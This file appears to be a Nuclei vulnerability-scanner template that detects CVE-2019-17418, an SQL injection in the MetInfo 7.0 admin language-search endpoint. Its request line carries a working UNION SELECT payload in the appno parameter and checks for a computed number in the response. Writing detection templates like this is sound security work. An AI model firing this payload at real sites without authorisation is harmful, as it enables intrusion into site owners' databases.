nuclei-templates/cves/2019/CVE-2019-17418.yaml

34 lines
953 B
YAML

id: CVE-2019-17418
info:
name: MetInfo 7.0 - SQL Injection
author: ritikchaddha
severity: high
description: An issue was discovered in MetInfo 7.0. There is SQL injection via the admin/?n=language&c=language_general&a=doSearchParameter appno parameter, a different issue than CVE-2019-16997
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-17418
tags: metinfo,sqli,cve,cve2019
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.20
cve-id: CVE-2019-17418
cwe-id: CWE-89
requests:
- method: GET
path:
- "{{BaseURL}}/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "43865094559"
- type: status
status:
- 200